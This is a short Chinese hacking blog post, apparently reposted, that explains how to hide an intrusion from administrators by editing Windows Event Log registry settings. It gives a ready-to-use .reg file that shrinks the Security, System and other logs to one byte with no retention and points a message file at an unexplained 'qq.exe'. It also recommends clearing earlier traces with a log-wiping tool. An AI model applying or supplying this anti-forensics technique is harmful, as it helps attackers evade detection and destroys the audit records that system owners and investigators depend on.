修改日志文件属性保护自己不会被管理员发现(思路)

by ha0k
日志文件的位置其实是存储在注册表中的,只要我们修改了其属性即可掩盖自己的入侵痕迹,
这里只修改默认位置,日志大小属性,比如日志大小为00000001,使其不能正常记录,
这样的话即可完美保证入侵不被记录,比清除日志更安全.当然首先配合清除日志工具,清除先前的痕迹,效果更好.
以下是demo代码:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog/Internet Explorer]
"MaxSize"=dword:00000001
"File"="%SystemRoot%/System32/Config/Internet Explorer.evt"
"Retention"=dword:00000000
"Sources"="hacked by ha0k"
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog/Security]
"file"="%SystemRoot%/System32/config/SecEvent.Evt"
"MaxSize"=dword:00000001
[HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog/System]
"EventMessageFile"="%systemroot%/system32/qq.exe"
"File"="%SystemRoot%/system32/config/SysEvent.Evt"
"MaxSize"=dword:00000001
{本文转自普瑞斯特博客-原文地址:http://www.hacksb.cn/post/144.html}

 

你可能感兴趣的:(windows,File,存储,工具)